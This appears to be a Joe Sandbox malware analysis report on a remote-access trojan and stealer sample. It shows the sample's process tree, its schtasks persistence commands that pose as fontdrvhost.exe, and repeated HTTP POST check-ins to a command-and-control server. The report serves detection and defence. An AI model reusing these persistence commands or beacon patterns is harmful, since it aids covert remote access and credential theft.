Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ZT3pxe2Tb4.exe

Overview

General Information

Sample name:ZT3pxe2Tb4.exe
renamed because original name is a hash value
Original sample name:4164D5955C244FF266C1CC41013FE21A.exe
Analysis ID:1417387
MD5:4164d5955c244ff266c1cc41013fe21a
SHA1:cd4b6caab8b3762d3af3b7ad738f51d2e92c2d34
SHA256:138905d6721c1e6b174b6f61154a938565c9bd5c6b5b0abe8274054bf151da9c
Tags:DCRatexe
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (creates a PE file in dynamic memory)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
Creates processes via WMI
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Files With System Process Name In Unsuspected Locations
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Schtasks From Env Var Folder
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • ZT3pxe2Tb4.exe (PID: 4484 cmdline: "C:\Users\user\Desktop\ZT3pxe2Tb4.exe" MD5: 4164D5955C244FF266C1CC41013FE21A)
    • schtasks.exe (PID: 5332 cmdline: schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 10 /tr "'C:\Users\user\AppData\Local\fontdrvhost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 3512 cmdline: schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Users\user\AppData\Local\fontdrvhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • schtasks.exe (PID: 4908 cmdline: schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 8 /tr "'C:\Users\user\AppData\Local\fontdrvhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
    • cmd.exe (PID: 1704 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\e2HUAivGfO.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 6764 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • PING.EXE (PID: 7080 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
      • fontdrvhost.exe (PID: 7376 cmdline: "C:\Users\user\AppData\Local\fontdrvhost.exe" MD5: 4164D5955C244FF266C1CC41013FE21A)
        • cmd.exe (PID: 7560 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\6WkFIbRMFr.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • chcp.com (PID: 7628 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
          • PING.EXE (PID: 7644 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
          • fontdrvhost.exe (PID: 7992 cmdline: "C:\Users\user\AppData\Local\fontdrvhost.exe" MD5: 4164D5955C244FF266C1CC41013FE21A)
            • cmd.exe (PID: 8188 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\s2nU7uS06N.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 5084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • chcp.com (PID: 3868 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
              • w32tm.exe (PID: 6128 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
              • fontdrvhost.exe (PID: 7300 cmdline: "C:\Users\user\AppData\Local\fontdrvhost.exe" MD5: 4164D5955C244FF266C1CC41013FE21A)
                • cmd.exe (PID: 2816 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ZMh4UPVO0I.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 4476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • chcp.com (PID: 7448 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                  • w32tm.exe (PID: 7488 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
                  • fontdrvhost.exe (PID: 5572 cmdline: "C:\Users\user\AppData\Local\fontdrvhost.exe" MD5: 4164D5955C244FF266C1CC41013FE21A)
                    • cmd.exe (PID: 7816 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\7nxekELsf0.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                      • conhost.exe (PID: 7804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                      • chcp.com (PID: 6812 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                      • PING.EXE (PID: 6976 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
                      • fontdrvhost.exe (PID: 7272 cmdline: "C:\Users\user\AppData\Local\fontdrvhost.exe" MD5: 4164D5955C244FF266C1CC41013FE21A)
                        • cmd.exe (PID: 7916 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\Gu3WPocxsu.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                          • conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                          • chcp.com (PID: 7620 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
                          • w32tm.exe (PID: 7612 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
                          • fontdrvhost.exe (PID: 2288 cmdline: "C:\Users\user\AppData\Local\fontdrvhost.exe" MD5: 4164D5955C244FF266C1CC41013FE21A)
  • fontdrvhost.exe (PID: 5496 cmdline: C:\Users\user\AppData\Local\fontdrvhost.exe MD5: 4164D5955C244FF266C1CC41013FE21A)
    • cmd.exe (PID: 7288 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\wuC6fcDv5B.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7332 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • PING.EXE (PID: 7344 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
      • fontdrvhost.exe (PID: 7736 cmdline: "C:\Users\user\AppData\Local\fontdrvhost.exe" MD5: 4164D5955C244FF266C1CC41013FE21A)
        • cmd.exe (PID: 7900 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\OwDUg2gYJx.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • chcp.com (PID: 7952 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
          • PING.EXE (PID: 7968 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
          • fontdrvhost.exe (PID: 3624 cmdline: "C:\Users\user\AppData\Local\fontdrvhost.exe" MD5: 4164D5955C244FF266C1CC41013FE21A)
            • cmd.exe (PID: 3592 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\I3W1TCNLwG.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 7580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • chcp.com (PID: 7704 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
              • PING.EXE (PID: 7360 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
              • fontdrvhost.exe (PID: 7244 cmdline: "C:\Users\user\AppData\Local\fontdrvhost.exe" MD5: 4164D5955C244FF266C1CC41013FE21A)
                • cmd.exe (PID: 984 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\3IMqqsTTOd.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 1984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • fontdrvhost.exe (PID: 6648 cmdline: C:\Users\user\AppData\Local\fontdrvhost.exe MD5: 4164D5955C244FF266C1CC41013FE21A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
ZT3pxe2Tb4.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    ZT3pxe2Tb4.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Local\fontdrvhost.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Users\user\AppData\Local\fontdrvhost.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

          Memory Dumps

          SourceRuleDescriptionAuthorStrings
          00000000.00000000.1606720859.00000000009E2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            00000000.00000002.1651517514.0000000013466000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
              Process Memory Space: ZT3pxe2Tb4.exe PID: 4484JoeSecurity_DCRat_1Yara detected DCRatJoe Security
                Process Memory Space: fontdrvhost.exe PID: 5496JoeSecurity_DCRat_1Yara detected DCRatJoe Security
                  Process Memory Space: fontdrvhost.exe PID: 6648JoeSecurity_DCRat_1Yara detected DCRatJoe Security

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    0.0.ZT3pxe2Tb4.exe.9e0000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                      0.0.ZT3pxe2Tb4.exe.9e0000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                        Sigma Signatures

                        System Summary

                        barindex
                        Sigma detected: Files With System Process Name In Unsuspected Locations
                        Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\ZT3pxe2Tb4.exe, ProcessId: 4484, TargetFilename: C:\Users\user\AppData\Local\fontdrvhost.exe
                        Sigma detected: Suspicious Schtasks From Env Var Folder
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 10 /tr "'C:\Users\user\AppData\Local\fontdrvhost.exe'" /f, CommandLine: schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 10 /tr "'C:\Users\user\AppData\Local\fontdrvhost.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\ZT3pxe2Tb4.exe", ParentImage: C:\Users\user\Desktop\ZT3pxe2Tb4.exe, ParentProcessId: 4484, ParentProcessName: ZT3pxe2Tb4.exe, ProcessCommandLine: schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 10 /tr "'C:\Users\user\AppData\Local\fontdrvhost.exe'" /f, ProcessId: 5332, ProcessName: schtasks.exe

                        Snort Signatures

                        Timestamp:03/29/24-07:38:03.072563
                        SID:2048095
                        Source Port:49745
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:03/29/24-07:37:10.589011
                        SID:2048095
                        Source Port:49731
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:03/29/24-07:37:41.258721
                        SID:2048095
                        Source Port:49742
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:03/29/24-07:37:01.421586
                        SID:2048095
                        Source Port:49730
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:03/29/24-07:37:37.301200
                        SID:2048095
                        Source Port:49741
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:03/29/24-07:38:15.792609
                        SID:2048095
                        Source Port:49746
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:03/29/24-07:37:55.065041
                        SID:2048095
                        Source Port:49744
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:03/29/24-07:37:32.317096
                        SID:2048095
                        Source Port:49740
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:03/29/24-07:38:55.054545
                        SID:2048095
                        Source Port:49749
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected
                        Timestamp:03/29/24-07:37:19.143924
                        SID:2048095
                        Source Port:49738
                        Destination Port:80
                        Protocol:TCP
                        Classtype:A Network Trojan was detected

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Antivirus / Scanner detection for submitted sample
                        Source: ZT3pxe2Tb4.exeAvira: detected
                        Antivirus detection for dropped file
                        Source: C:\Users\user\AppData\Local\Temp\6WkFIbRMFr.batAvira: detection malicious, Label: BAT/Runner.IK
                        Source: C:\Users\user\AppData\Local\Temp\I3W1TCNLwG.batAvira: detection malicious, Label: BAT/Runner.IK
                        Source: C:\Users\user\AppData\Local\Temp\s2nU7uS06N.batAvira: detection malicious, Label: BAT/Runner.IL
                        Source: C:\Users\user\Desktop\DACRVJoK.logAvira: detection malicious, Label: HEUR/AGEN.1362695
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                        Source: C:\Users\user\AppData\Local\Temp\ZMh4UPVO0I.batAvira: detection malicious, Label: BAT/Runner.IL
                        Source: C:\Users\user\Desktop\CgRzmzKC.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                        Source: C:\Users\user\AppData\Local\Temp\OwDUg2gYJx.batAvira: detection malicious, Label: BAT/Runner.IK
                        Source: C:\Users\user\Desktop\ELDRalsN.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                        Source: C:\Users\user\AppData\Local\Temp\wuC6fcDv5B.batAvira: detection malicious, Label: BAT/Runner.IK
                        Source: C:\Users\user\AppData\Local\Temp\Gu3WPocxsu.batAvira: detection malicious, Label: BAT/Runner.IL
                        Source: C:\Users\user\AppData\Local\Temp\7nxekELsf0.batAvira: detection malicious, Label: BAT/Runner.IK
                        Source: C:\Users\user\Desktop\CGTrJaEm.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                        Source: C:\Users\user\Desktop\AFOsBjYP.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                        Source: C:\Users\user\AppData\Local\Temp\e2HUAivGfO.batAvira: detection malicious, Label: BAT/Runner.IK
                        Source: C:\Users\user\AppData\Local\Temp\3IMqqsTTOd.batAvira: detection malicious, Label: BAT/Runner.IK
                        Multi AV Scanner detection for dropped file
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeReversingLabs: Detection: 86%
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeVirustotal: Detection: 72%Perma Link
                        Source: C:\Users\user\Desktop\AFOsBjYP.logVirustotal: Detection: 19%Perma Link
                        Source: C:\Users\user\Desktop\AaPSReOe.logVirustotal: Detection: 7%Perma Link
                        Source: C:\Users\user\Desktop\CGTrJaEm.logReversingLabs: Detection: 66%
                        Source: C:\Users\user\Desktop\CGTrJaEm.logVirustotal: Detection: 69%Perma Link
                        Source: C:\Users\user\Desktop\COTaDrJc.logVirustotal: Detection: 21%Perma Link
                        Source: C:\Users\user\Desktop\CTQIQVae.logVirustotal: Detection: 7%Perma Link
                        Source: C:\Users\user\Desktop\CgRzmzKC.logReversingLabs: Detection: 66%
                        Source: C:\Users\user\Desktop\CgRzmzKC.logVirustotal: Detection: 69%Perma Link
                        Source: C:\Users\user\Desktop\CkrRJHNx.logVirustotal: Detection: 8%Perma Link
                        Source: C:\Users\user\Desktop\DACRVJoK.logVirustotal: Detection: 7%Perma Link
                        Source: C:\Users\user\Desktop\FWXhQVXq.logVirustotal: Detection: 19%Perma Link
                        Source: C:\Users\user\Desktop\FWzHsBqG.logVirustotal: Detection: 7%Perma Link
                        Multi AV Scanner detection for submitted file
                        Source: ZT3pxe2Tb4.exeReversingLabs: Detection: 86%
                        Source: ZT3pxe2Tb4.exeVirustotal: Detection: 73%Perma Link
                        Machine Learning detection for dropped file
                        Source: C:\Users\user\Desktop\CTQIQVae.logJoe Sandbox ML: detected
                        Source: C:\Users\user\Desktop\CkrRJHNx.logJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\Desktop\AaPSReOe.logJoe Sandbox ML: detected
                        Machine Learning detection for sample
                        Source: ZT3pxe2Tb4.exeJoe Sandbox ML: detected

                        Compliance

                        barindex
                        Detected unpacking (creates a PE file in dynamic memory)
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeUnpacked PE file: 0.2.ZT3pxe2Tb4.exe.1670000.5.unpack
                        Source: ZT3pxe2Tb4.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                        Source: ZT3pxe2Tb4.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbnet0l source: fontdrvhost.exe, 00000034.00000002.2239140021.0000000000885000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: fontdrvhost.exe, 00000008.00000002.1748627136.000000001BF60000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000000E.00000002.1845478401.000000001C9D2000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000015.00000002.2055064818.000000001B7E8000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000002A.00000002.2218891440.000000001BE82000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000033.00000002.2698860484.000000001B70B000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000034.00000002.2506178713.000000001BDD7000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: em.pdbd source: fontdrvhost.exe, 00000022.00000002.2098127256.000000001C46A000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbnnecg source: fontdrvhost.exe, 00000034.00000002.2239140021.0000000000885000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: em.pdb source: fontdrvhost.exe, 0000002A.00000002.2225604158.000000001CC92000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: System.pdb source: fontdrvhost.exe, 00000008.00000002.1748627136.000000001BF60000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000000E.00000002.1845478401.000000001C9D2000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000015.00000002.2055064818.000000001B7E8000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000002A.00000002.2218891440.000000001BE82000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000033.00000002.2698860484.000000001B70B000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 00000034.00000002.2506178713.000000001BDD7000.00000004.00000020.00020000.00000000.sdmp
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile opened: C:\Users\userJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile opened: C:\Users\user\AppDataJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                        Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh0_2_00007FFD9BBCD16D
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh8_2_00007FFD9BBAD16D
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 4x nop then jmp 00007FFD9BA21F76h9_2_00007FFD9BA21D6E
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh14_2_00007FFD9BBDD16D
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 4x nop then jmp 00007FFD9BA01F76h21_2_00007FFD9BA01D6E
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh21_2_00007FFD9BBAD16D
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh27_2_00007FFD9BBBD16D
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh34_2_00007FFD9BB9D16D
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 4x nop then jmp 00007FFD9BA21F76h35_2_00007FFD9BA21D6E
                        Source: C:\Users\user\AppData\Local\fontdrvhost.exeCode function: 4x nop then mov dword ptr [ebp-04h], 7FFFFFFFh35_2_00007FFD9BBCD16D

                        Networking

                        barindex
                        Snort IDS alert for network traffic
                        Source: TrafficSnort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49730 -> 89.23.98.225:80
                        Source: TrafficSnort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49731 -> 89.23.98.225:80
                        Source: TrafficSnort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49738 -> 89.23.98.225:80
                        Source: TrafficSnort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49740 -> 89.23.98.225:80
                        Source: TrafficSnort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49741 -> 89.23.98.225:80
                        Source: TrafficSnort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49742 -> 89.23.98.225:80
                        Source: TrafficSnort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49744 -> 89.23.98.225:80
                        Source: TrafficSnort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49745 -> 89.23.98.225:80
                        Source: TrafficSnort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49746 -> 89.23.98.225:80
                        Source: TrafficSnort IDS: 2048095 ET TROJAN [ANY.RUN] DarkCrystal Rat Check-in (POST) 192.168.2.4:49749 -> 89.23.98.225:80
                        Uses ping.exe to check the status of other devices and networks
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                        Source: Joe Sandbox ViewASN Name: MAXITEL-ASRU MAXITEL-ASRU
                        Source: global trafficHTTP traffic detected: POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 89.23.98.225Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60Host: 89.23.98.225Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: 89.23.98.225Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29Host: 89.23.98.225Content-Length: 336Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 89.23.98.225Content-Length: 344Expect: 100-continueConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: POST /8pollDbvoiddb/DatalifeFlowerWp/processbaseMariadb1/Defaultbigloadpython/Generator/videoLowUpdateDbasync.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0Host: 89.23.98.225Content-Length: 344Expect: 100-continueConnection: Keep-Alive
